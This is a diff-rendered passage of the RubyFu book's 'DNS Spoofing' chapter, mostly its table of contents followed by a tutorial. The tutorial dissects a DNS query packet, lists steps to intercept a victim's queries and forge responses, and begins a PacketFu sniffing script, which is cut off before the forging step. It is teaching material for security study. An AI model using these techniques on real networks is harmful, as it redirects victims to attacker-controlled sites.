|
586
|
+
|
|
587
|
+
</li>
|
|
588
|
+
|
|
589
|
+
<li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
|
|
590
|
+
|
|
591
|
+
|
|
592
|
+
<a href="../module_0x3__network_kung_fu/tns_enumeration.html">
|
|
593
|
+
|
|
594
|
+
<i class="fa fa-check"></i>
|
|
595
|
+
|
|
596
|
+
<b>3.9.</b>
|
|
597
|
+
|
|
598
|
+
Oracle TNS Enumeration
|
|
599
|
+
</a>
|
|
600
|
+
|
|
601
|
+
|
|
602
|
+
</li>
|
|
603
|
+
|
|
604
|
+
<li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
|
|
605
|
+
|
|
606
|
+
|
|
607
|
+
<a href="../module_0x3__network_kung_fu/packet_manipulation.html">
|
|
608
|
+
|
|
609
|
+
<i class="fa fa-check"></i>
|
|
610
|
+
|
|
611
|
+
<b>3.10.</b>
|
|
612
|
+
|
|
613
|
+
Packet manipulation
|
|
614
|
+
</a>
|
|
615
|
+
|
|
616
|
+
|
|
617
|
+
<ul class="articles">
|
|
618
|
+
|
|
619
|
+
|
|
620
|
+
<li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
|
|
621
|
+
|
|
622
|
+
|
|
623
|
+
<a href="../module_0x3__network_kung_fu/arp_spoofing.html">
|
|
624
|
+
|
|
625
|
+
<i class="fa fa-check"></i>
|
|
626
|
+
|
|
627
|
+
<b>3.10.1.</b>
|
|
628
|
+
|
|
629
|
+
ARP Spoofing
|
|
630
|
+
</a>
|
|
631
|
+
|
|
632
|
+
|
|
633
|
+
</li>
|
|
634
|
+
|
|
635
|
+
<li class="chapter active" data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
|
|
636
|
+
|
|
637
|
+
|
|
638
|
+
<a href="../module_0x3__network_kung_fu/dns_spoofing.html">
|
|
639
|
+
|
|
640
|
+
<i class="fa fa-check"></i>
|
|
641
|
+
|
|
642
|
+
<b>3.10.2.</b>
|
|
643
|
+
|
|
644
|
+
DNS Spoofing
|
|
645
|
+
</a>
|
|
646
|
+
|
|
647
|
+
|
|
648
|
+
</li>
|
|
649
|
+
|
|
650
|
+
|
|
651
|
+
</ul>
|
|
652
|
+
|
|
653
|
+
</li>
|
|
654
|
+
|
|
655
|
+
|
|
656
|
+
</ul>
|
|
657
|
+
|
|
658
|
+
</li>
|
|
659
|
+
|
|
660
|
+
<li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
|
|
661
|
+
|
|
662
|
+
|
|
663
|
+
<a href="../module_0x4__web_kung_fu/index.html">
|
|
664
|
+
|
|
665
|
+
<i class="fa fa-check"></i>
|
|
666
|
+
|
|
667
|
+
<b>4.</b>
|
|
668
|
+
|
|
669
|
+
Module 0x4 | Web Kung Fu
|
|
670
|
+
</a>
|
|
671
|
+
|
|
672
|
+
|
|
673
|
+
<ul class="articles">
|
|
674
|
+
|
|
675
|
+
|
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
|
677
|
+
|
|
678
|
+
|
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
|
680
|
+
|
|
681
|
+
<i class="fa fa-check"></i>
|
|
682
|
+
|
|
683
|
+
<b>4.1.</b>
|
|
684
|
+
|
|
685
|
+
SQL Injection Scanner
|
|
686
|
+
</a>
|
|
687
|
+
|
|
688
|
+
|
|
689
|
+
</li>
|
|
690
|
+
|
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
|
692
|
+
|
|
693
|
+
|
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
|
695
|
+
|
|
696
|
+
<i class="fa fa-check"></i>
|
|
697
|
+
|
|
698
|
+
<b>4.2.</b>
|
|
699
|
+
|
|
700
|
+
Databases
|
|
701
|
+
</a>
|
|
702
|
+
|
|
703
|
+
|
|
704
|
+
</li>
|
|
705
|
+
|
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
|
707
|
+
|
|
708
|
+
|
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
|
710
|
+
|
|
711
|
+
<i class="fa fa-check"></i>
|
|
712
|
+
|
|
713
|
+
<b>4.3.</b>
|
|
714
|
+
|
|
715
|
+
Extending Burp Suite
|
|
716
|
+
</a>
|
|
717
|
+
|
|
718
|
+
|
|
719
|
+
</li>
|
|
720
|
+
|
|
721
|
+
<li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
|
722
|
+
|
|
723
|
+
|
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
|
725
|
+
|
|
726
|
+
<i class="fa fa-check"></i>
|
|
727
|
+
|
|
728
|
+
<b>4.4.</b>
|
|
729
|
+
|
|
730
|
+
Browser Manipulation
|
|
731
|
+
</a>
|
|
732
|
+
|
|
733
|
+
|
|
734
|
+
</li>
|
|
735
|
+
|
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
|
737
|
+
|
|
738
|
+
|
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
|
740
|
+
|
|
741
|
+
<i class="fa fa-check"></i>
|
|
742
|
+
|
|
743
|
+
<b>4.5.</b>
|
|
744
|
+
|
|
745
|
+
Web Services and APIs
|
|
746
|
+
</a>
|
|
747
|
+
|
|
748
|
+
|
|
749
|
+
<ul class="articles">
|
|
750
|
+
|
|
751
|
+
|
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
|
753
|
+
|
|
754
|
+
|
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
|
756
|
+
|
|
757
|
+
<i class="fa fa-check"></i>
|
|
758
|
+
|
|
759
|
+
<b>4.5.1.</b>
|
|
760
|
+
|
|
761
|
+
Interacting with Web Services
|
|
762
|
+
</a>
|
|
763
|
+
|
|
764
|
+
|
|
765
|
+
</li>
|
|
766
|
+
|
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
|
768
|
+
|
|
769
|
+
|
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
|
771
|
+
|
|
772
|
+
<i class="fa fa-check"></i>
|
|
773
|
+
|
|
774
|
+
<b>4.5.2.</b>
|
|
775
|
+
|
|
776
|
+
Interacting with APIs
|
|
777
|
+
</a>
|
|
778
|
+
|
|
779
|
+
|
|
780
|
+
<ul class="articles">
|
|
781
|
+
|
|
782
|
+
|
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
|
784
|
+
|
|
785
|
+
|
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
|
787
|
+
|
|
788
|
+
<i class="fa fa-check"></i>
|
|
789
|
+
|
|
790
|
+
<b>4.5.2.1.</b>
|
|
791
|
+
|
|
792
|
+
WordPress API
|
|
793
|
+
</a>
|
|
794
|
+
|
|
795
|
+
|
|
796
|
+
</li>
|
|
797
|
+
|
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
|
799
|
+
|
|
800
|
+
|
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
|
802
|
+
|
|
803
|
+
<i class="fa fa-check"></i>
|
|
804
|
+
|
|
805
|
+
<b>4.5.2.2.</b>
|
|
806
|
+
|
|
807
|
+
Twitter API
|
|
808
|
+
</a>
|
|
809
|
+
|
|
810
|
+
|
|
811
|
+
</li>
|
|
812
|
+
|
|
813
|
+
|
|
814
|
+
</ul>
|
|
815
|
+
|
|
816
|
+
</li>
|
|
817
|
+
|
|
818
|
+
|
|
819
|
+
</ul>
|
|
820
|
+
|
|
821
|
+
</li>
|
|
822
|
+
|
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
|
824
|
+
|
|
825
|
+
|
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
|
827
|
+
|
|
828
|
+
<i class="fa fa-check"></i>
|
|
829
|
+
|
|
830
|
+
<b>4.6.</b>
|
|
831
|
+
|
|
832
|
+
Ruby 2 JavaScript
|
|
833
|
+
</a>
|
|
834
|
+
|
|
835
|
+
|
|
836
|
+
</li>
|
|
837
|
+
|
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
|
839
|
+
|
|
840
|
+
|
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
|
842
|
+
|
|
843
|
+
<i class="fa fa-check"></i>
|
|
844
|
+
|
|
845
|
+
<b>4.7.</b>
|
|
846
|
+
|
|
847
|
+
Web Server and Proxy
|
|
848
|
+
</a>
|
|
849
|
+
|
|
850
|
+
|
|
851
|
+
</li>
|
|
852
|
+
|
|
853
|
+
|
|
854
|
+
</ul>
|
|
855
|
+
|
|
856
|
+
</li>
|
|
857
|
+
|
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
|
859
|
+
|
|
860
|
+
|
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
|
862
|
+
|
|
863
|
+
<i class="fa fa-check"></i>
|
|
864
|
+
|
|
865
|
+
<b>5.</b>
|
|
866
|
+
|
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
|
868
|
+
</a>
|
|
869
|
+
|
|
870
|
+
|
|
871
|
+
<ul class="articles">
|
|
872
|
+
|
|
873
|
+
|
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
|
875
|
+
|
|
876
|
+
|
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
|
878
|
+
|
|
879
|
+
<i class="fa fa-check"></i>
|
|
880
|
+
|
|
881
|
+
<b>5.1.</b>
|
|
882
|
+
|
|
883
|
+
Fuzzer
|
|
884
|
+
</a>
|
|
885
|
+
|
|
886
|
+
|
|
887
|
+
</li>
|
|
888
|
+
|
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
|
890
|
+
|
|
891
|
+
|
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
|
893
|
+
|
|
894
|
+
<i class="fa fa-check"></i>
|
|
895
|
+
|
|
896
|
+
<b>5.2.</b>
|
|
897
|
+
|
|
898
|
+
Metasploit
|
|
899
|
+
</a>
|
|
900
|
+
|
|
901
|
+
|
|
902
|
+
<ul class="articles">
|
|
903
|
+
|
|
904
|
+
|
|
905
|
+
<li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
|
906
|
+
|
|
907
|
+
|
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
|
909
|
+
|
|
910
|
+
<i class="fa fa-check"></i>
|
|
911
|
+
|
|
912
|
+
<b>5.2.1.</b>
|
|
913
|
+
|
|
914
|
+
Auxiliary module
|
|
915
|
+
</a>
|
|
916
|
+
|
|
917
|
+
|
|
918
|
+
</li>
|
|
919
|
+
|
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
|
921
|
+
|
|
922
|
+
|
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
|
924
|
+
|
|
925
|
+
<i class="fa fa-check"></i>
|
|
926
|
+
|
|
927
|
+
<b>5.2.2.</b>
|
|
928
|
+
|
|
929
|
+
Exploit module
|
|
930
|
+
</a>
|
|
931
|
+
|
|
932
|
+
|
|
933
|
+
</li>
|
|
934
|
+
|
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
|
936
|
+
|
|
937
|
+
|
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
|
939
|
+
|
|
940
|
+
<i class="fa fa-check"></i>
|
|
941
|
+
|
|
942
|
+
<b>5.2.3.</b>
|
|
943
|
+
|
|
944
|
+
Meterpreter
|
|
945
|
+
</a>
|
|
946
|
+
|
|
947
|
+
|
|
948
|
+
<ul class="articles">
|
|
949
|
+
|
|
950
|
+
|
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
|
952
|
+
|
|
953
|
+
|
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
|
955
|
+
|
|
956
|
+
<i class="fa fa-check"></i>
|
|
957
|
+
|
|
958
|
+
<b>5.2.3.1.</b>
|
|
959
|
+
|
|
960
|
+
API and Extensions
|
|
961
|
+
</a>
|
|
962
|
+
|
|
963
|
+
|
|
964
|
+
</li>
|
|
965
|
+
|
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
|
967
|
+
|
|
968
|
+
|
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
|
970
|
+
|
|
971
|
+
<i class="fa fa-check"></i>
|
|
972
|
+
|
|
973
|
+
<b>5.2.3.2.</b>
|
|
974
|
+
|
|
975
|
+
Meterpreter Scripting
|
|
976
|
+
</a>
|
|
977
|
+
|
|
978
|
+
|
|
979
|
+
</li>
|
|
980
|
+
|
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
|
982
|
+
|
|
983
|
+
|
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
|
985
|
+
|
|
986
|
+
<i class="fa fa-check"></i>
|
|
987
|
+
|
|
988
|
+
<b>5.2.3.3.</b>
|
|
989
|
+
|
|
990
|
+
Railgun API Extension
|
|
991
|
+
</a>
|
|
992
|
+
|
|
993
|
+
|
|
994
|
+
</li>
|
|
995
|
+
|
|
996
|
+
|
|
997
|
+
</ul>
|
|
998
|
+
|
|
999
|
+
</li>
|
|
1000
|
+
|
|
1001
|
+
|
|
1002
|
+
</ul>
|
|
1003
|
+
|
|
1004
|
+
</li>
|
|
1005
|
+
|
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
|
1007
|
+
|
|
1008
|
+
|
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
|
1010
|
+
|
|
1011
|
+
<i class="fa fa-check"></i>
|
|
1012
|
+
|
|
1013
|
+
<b>5.3.</b>
|
|
1014
|
+
|
|
1015
|
+
metasm
|
|
1016
|
+
</a>
|
|
1017
|
+
|
|
1018
|
+
|
|
1019
|
+
</li>
|
|
1020
|
+
|
|
1021
|
+
|
|
1022
|
+
</ul>
|
|
1023
|
+
|
|
1024
|
+
</li>
|
|
1025
|
+
|
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
|
1027
|
+
|
|
1028
|
+
|
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
|
1030
|
+
|
|
1031
|
+
<i class="fa fa-check"></i>
|
|
1032
|
+
|
|
1033
|
+
<b>6.</b>
|
|
1034
|
+
|
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
|
1036
|
+
</a>
|
|
1037
|
+
|
|
1038
|
+
|
|
1039
|
+
<ul class="articles">
|
|
1040
|
+
|
|
1041
|
+
|
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
|
1043
|
+
|
|
1044
|
+
|
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
|
1046
|
+
|
|
1047
|
+
<i class="fa fa-check"></i>
|
|
1048
|
+
|
|
1049
|
+
<b>6.1.</b>
|
|
1050
|
+
|
|
1051
|
+
Windows Forensic
|
|
1052
|
+
</a>
|
|
1053
|
+
|
|
1054
|
+
|
|
1055
|
+
</li>
|
|
1056
|
+
|
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
|
1058
|
+
|
|
1059
|
+
|
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
|
1061
|
+
|
|
1062
|
+
<i class="fa fa-check"></i>
|
|
1063
|
+
|
|
1064
|
+
<b>6.2.</b>
|
|
1065
|
+
|
|
1066
|
+
Android Forensic
|
|
1067
|
+
</a>
|
|
1068
|
+
|
|
1069
|
+
|
|
1070
|
+
</li>
|
|
1071
|
+
|
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
|
1073
|
+
|
|
1074
|
+
|
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
|
1076
|
+
|
|
1077
|
+
<i class="fa fa-check"></i>
|
|
1078
|
+
|
|
1079
|
+
<b>6.3.</b>
|
|
1080
|
+
|
|
1081
|
+
Network Traffic Analysis
|
|
1082
|
+
</a>
|
|
1083
|
+
|
|
1084
|
+
|
|
1085
|
+
</li>
|
|
1086
|
+
|
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
|
1088
|
+
|
|
1089
|
+
|
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
|
1091
|
+
|
|
1092
|
+
<i class="fa fa-check"></i>
|
|
1093
|
+
|
|
1094
|
+
<b>6.4.</b>
|
|
1095
|
+
|
|
1096
|
+
Parsing Log Files
|
|
1097
|
+
</a>
|
|
1098
|
+
|
|
1099
|
+
|
|
1100
|
+
</li>
|
|
1101
|
+
|
|
1102
|
+
|
|
1103
|
+
</ul>
|
|
1104
|
+
|
|
1105
|
+
</li>
|
|
1106
|
+
|
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
|
1108
|
+
|
|
1109
|
+
|
|
1110
|
+
<a href="../references/index.html">
|
|
1111
|
+
|
|
1112
|
+
<i class="fa fa-check"></i>
|
|
1113
|
+
|
|
1114
|
+
<b>7.</b>
|
|
1115
|
+
|
|
1116
|
+
References
|
|
1117
|
+
</a>
|
|
1118
|
+
|
|
1119
|
+
|
|
1120
|
+
</li>
|
|
1121
|
+
|
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
|
1123
|
+
|
|
1124
|
+
|
|
1125
|
+
<a href="../faqs/index.html">
|
|
1126
|
+
|
|
1127
|
+
<i class="fa fa-check"></i>
|
|
1128
|
+
|
|
1129
|
+
<b>8.</b>
|
|
1130
|
+
|
|
1131
|
+
FAQs
|
|
1132
|
+
</a>
|
|
1133
|
+
|
|
1134
|
+
|
|
1135
|
+
</li>
|
|
1136
|
+
|
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
|
1138
|
+
|
|
1139
|
+
|
|
1140
|
+
<a href="../contributors/index.html">
|
|
1141
|
+
|
|
1142
|
+
<i class="fa fa-check"></i>
|
|
1143
|
+
|
|
1144
|
+
<b>9.</b>
|
|
1145
|
+
|
|
1146
|
+
Contributors
|
|
1147
|
+
</a>
|
|
1148
|
+
|
|
1149
|
+
|
|
1150
|
+
<ul class="articles">
|
|
1151
|
+
|
|
1152
|
+
|
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
|
1154
|
+
|
|
1155
|
+
|
|
1156
|
+
<a href="../contributors/todo.html">
|
|
1157
|
+
|
|
1158
|
+
<i class="fa fa-check"></i>
|
|
1159
|
+
|
|
1160
|
+
<b>9.1.</b>
|
|
1161
|
+
|
|
1162
|
+
TODO
|
|
1163
|
+
</a>
|
|
1164
|
+
|
|
1165
|
+
|
|
1166
|
+
</li>
|
|
1167
|
+
|
|
1168
|
+
|
|
1169
|
+
</ul>
|
|
1170
|
+
|
|
1171
|
+
</li>
|
|
1172
|
+
|
|
1173
|
+
|
|
1174
|
+
|
|
1175
|
+
|
|
1176
|
+
<li class="divider"></li>
|
|
1177
|
+
<li>
|
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
|
1179
|
+
Published with GitBook
|
|
1180
|
+
</a>
|
|
1181
|
+
</li>
|
|
1182
|
+
|
|
1183
|
+
</ul>
|
|
1184
|
+
</nav>
|
|
1185
|
+
</div>
|
|
1186
|
+
|
|
1187
|
+
<div class="book-body">
|
|
1188
|
+
<div class="body-inner">
|
|
1189
|
+
<div class="book-header" role="navigation">
|
|
1190
|
+
<!-- Actions Left -->
|
|
1191
|
+
|
|
1192
|
+
|
|
1193
|
+
<!-- Title -->
|
|
1194
|
+
<h1>
|
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
|
1196
|
+
<a href="../" >RubyFu</a>
|
|
1197
|
+
</h1>
|
|
1198
|
+
</div>
|
|
1199
|
+
|
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
|
1201
|
+
<div class="page-inner">
|
|
1202
|
+
|
|
1203
|
+
|
|
1204
|
+
<section class="normal" id="section-">
|
|
1205
|
+
|
|
1206
|
+
<h1 id="dns-spoofing"><a name="dns-spoofing" class="plugin-anchor" href="#dns-spoofing"><span class="fa fa-link"></span></a>DNS Spoofing</h1>
|
|
1207
|
+
<p>Continuing our attack through <a href="module_0x4__network_kung_fu/arp_spoofing.md">ARP Spoofing</a>, we want to change the victim's DNS request to whatever destination we like.</p>
|
|
1208
|
+
<h3 id="scenario"><a name="scenario" class="plugin-anchor" href="#scenario"><span class="fa fa-link"></span></a>Scenario</h3>
|
|
1209
|
+
<pre><code> |Attacker|
|
|
1210
|
+
| AttackerSite
|
|
1211
|
+
٧ AttackerSite
|
|
1212
|
+
|Victim| ----------/ \----------> |Router| ----------> Internet
|
|
1213
|
+
AnySite AttackerSite
|
|
1214
|
+
</code></pre><blockquote>
|
|
1215
|
+
<p>Keep the ARP spoof attack running</p>
|
|
1216
|
+
</blockquote>
|
|
1217
|
+
<p>The same IPs of ARP spoof attack</p>
|
|
1218
|
+
<table>
|
|
1219
|
+
<thead>
|
|
1220
|
+
<tr>
|
|
1221
|
+
<th style="text-align:center">Host</th>
|
|
1222
|
+
<th style="text-align:center">IP Address</th>
|
|
1223
|
+
</tr>
|
|
1224
|
+
</thead>
|
|
1225
|
+
<tbody>
|
|
1226
|
+
<tr>
|
|
1227
|
+
<td style="text-align:center">Attacker</td>
|
|
1228
|
+
<td style="text-align:center">192.168.0.100</td>
|
|
1229
|
+
</tr>
|
|
1230
|
+
<tr>
|
|
1231
|
+
<td style="text-align:center">Victim</td>
|
|
1232
|
+
<td style="text-align:center">192.168.0.21</td>
|
|
1233
|
+
</tr>
|
|
1234
|
+
<tr>
|
|
1235
|
+
<td style="text-align:center">Router</td>
|
|
1236
|
+
<td style="text-align:center">192.168.0.1</td>
|
|
1237
|
+
</tr>
|
|
1238
|
+
</tbody>
|
|
1239
|
+
</table>
|
|
1240
|
+
<p>Now we cant intercept DNS Query packet coming from victim's machine. Since PacketFu supports filters in capturing (to reduce mount of captured packets) we'll use <code>udp and port 53 and host</code> filter, then we'll inspect the captured packet to ensure that it's a query then find the requested domain. <a href="../files/module03/dns_spoofing_dns-req_res.pcap.pcapng"><strong>Download DNS packet</strong></a>.</p>
|
|
1241
|
+
<p>From Wireshark, if we take a deeper look at the DNS query payload in <code>Domain Name System (query)</code>, we can see its been presented in hexadecimal format.</p>
|
|
1242
|
+
<table>
|
|
1243
|
+
<thead>
|
|
1244
|
+
<tr>
|
|
1245
|
+
<th style="text-align:center"><img src="../images/module03/dns_spoofing_wireshark1.png" alt="Wireshark"></th>
|
|
1246
|
+
</tr>
|
|
1247
|
+
</thead>
|
|
1248
|
+
<tbody>
|
|
1249
|
+
<tr>
|
|
1250
|
+
<td style="text-align:center"><strong>Figure 1.</strong> DNS query Payload</td>
|
|
1251
|
+
</tr>
|
|
1252
|
+
</tbody>
|
|
1253
|
+
</table>
|
|
1254
|
+
<p>Let's to anatomize our payload</p>
|
|
1255
|
+
<pre><code>0000 e7 1d 01 00 00 01 00 00 00 00 00 00 07 74 77 69
|
|
1256
|
+
0010 74 74 65 72 03 63 6f 6d 00 00 01 00 01
|
|
1257
|
+
</code></pre><ul>
|
|
1258
|
+
<li>The First 2 bytes is the <strong>Transaction ID</strong> and we don't care about it for now. (Our case: <code>\xe7\x1d</code>)</li>
|
|
1259
|
+
<li>The next 2 bytes is the <strong>Flags</strong><sup><a href="#fn_3" id="reffn_3">3</a></sup>. (We need: <code>\x01\x00</code> = \x10)</li>
|
|
1260
|
+
<li>Furthermore, in <strong>Queries</strong> section which contains</li>
|
|
1261
|
+
</ul>
|
|
1262
|
+
<pre><code>0000 07 74 77 69 74 74 65 72 03 63 6f 6d 00 00 01 00
|
|
1263
|
+
0010 01
|
|
1264
|
+
</code></pre><ul>
|
|
1265
|
+
<li><p>The <strong>Queries</strong> starts at <em>13 byte</em> of the payload.</p>
|
|
1266
|
+
<ul>
|
|
1267
|
+
<li><p>The 13th byte specifies the length of the domain name <em>before</em> the <em>very first dot</em> (without last dot com or whatever the top domain is). (Our case: <code>\x07</code>)
|
|
1268
|
+
<strong>Try:</strong><code>[%w{ 74 77 69 74 74 65 72 }.join].pack("H*")</code></p>
|
|
1269
|
+
<ul>
|
|
1270
|
+
<li>Notice The domain name of "twitter.com" equals <code>\x07</code> but "www.twitter.com" equals <code>\x03</code> the same consideration for subdomains</li>
|
|
1271
|
+
<li><p>Each dot after first dot will be replaced with the length of the followed characters</p>
|
|
1272
|
+
<p><strong>e.g.</strong> www.google.co.uk</p>
|
|
1273
|
+
<ul>
|
|
1274
|
+
<li>First length (<strong>www</strong>) => will be replaced with <code>\x03</code></li>
|
|
1275
|
+
<li>First dot(<strong>.google</strong>) => will be replaced with <code>\x06</code></li>
|
|
1276
|
+
<li>Second dot(<strong>.co</strong>) => will be replaced with <code>\x02</code></li>
|
|
1277
|
+
<li>Third dot(<strong>.uk</strong>) => will be replaced with <code>\x02</code></li>
|
|
1278
|
+
</ul>
|
|
1279
|
+
</li>
|
|
1280
|
+
</ul>
|
|
1281
|
+
</li>
|
|
1282
|
+
<li><p>The very end of the domain name string is terminated by a <code>\x00</code>.</p>
|
|
1283
|
+
</li>
|
|
1284
|
+
<li>The next 2 bytes refers to the <strong>type of the query</strong><sup><a href="#fn_4" id="reffn_4">4</a></sup>. (Our case: <code>\x00\x01</code>)</li>
|
|
1285
|
+
</ul>
|
|
1286
|
+
</li>
|
|
1287
|
+
</ul>
|
|
1288
|
+
<p><strong>Now what?!</strong></p>
|
|
1289
|
+
<ul>
|
|
1290
|
+
<li>We need to start capturing/sniffing on specific interface</li>
|
|
1291
|
+
<li>We need to enable promiscuous mode on our interface</li>
|
|
1292
|
+
<li>We need to capture UDP packets on port 53 only</li>
|
|
1293
|
+
<li>We need parse/analyze the valid UDP packets only</li>
|
|
1294
|
+
<li>We need to make sure this packet is a DNS query</li>
|
|
1295
|
+
<li>We need to get the queried/requested domain<ul>
|
|
1296
|
+
<li>We need to know the domain length</li>
|
|
1297
|
+
<li>We need to get the FQDN</li>
|
|
1298
|
+
</ul>
|
|
1299
|
+
</li>
|
|
1300
|
+
<li>Build a DNS response</li>
|
|
1301
|
+
<li>Replace the requested domain with any domain we want</li>
|
|
1302
|
+
<li>Re inject the packet into victim connection and send</li>
|
|
1303
|
+
</ul>
|
|
1304
|
+
<p>I'll divide our tasks then wrap it up in one script</p>
|
|
1305
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
|
1306
|
+
<span class="hljs-comment">#</span>
|
|
1307
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'packetfu'</span>
|
|
1308
|
+
|
|
1309
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
|
|
1310
|
+
|
|
1311
|
+
<span class="hljs-comment">#</span>
|
|
1312
|
+
<span class="hljs-comment"># * We need to start capturing/sniffing on specific interface</span>
|
|
1313
|
+
<span class="hljs-comment"># * We need to enable promiscuous mode on our interface</span>
|
|
1314
|
+
<span class="hljs-comment"># * We need to capture UDP packets on port 53 only</span>
|
|
1315
|
+
<span class="hljs-comment">#</span>
|
|
1316
|
+
filter = <span class="hljs-string">"udp and port 53 and host "</span> + <span class="hljs-string">"192.168.0.21"</span>
|
|
1317
|
+
capture = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> => <span class="hljs-string">"wlan0"</span>,<span class="hljs-symbol">:start</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> => filter, <span class="hljs-symbol">:save</span> => <span class="hljs-keyword">true</span>)
|
|
1318
|
+
|
|
1319
|
+
<span class="hljs-comment"># * We need to get the queried/requested domain</span>
|
|
1320
|
+
<span class="hljs-comment"># * We need to know the domain length</span>
|
|
1321
|
+
<span class="hljs-comment"># * We need to get the FQDN</span>
|
|
1322
|
+
<span class="hljs-comment">#</span>
|
|
1323
|
+
<span class="hljs-comment"># Convert DNS Payload to readable - Find The FQDN</span>
|
|
1324
|
+
<span class="hljs-comment">#</span>
|
|
1325
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
|
|
1326
|
+
<span class="hljs-comment"># Prevent processing non domain</span>
|
|
1327
|
+
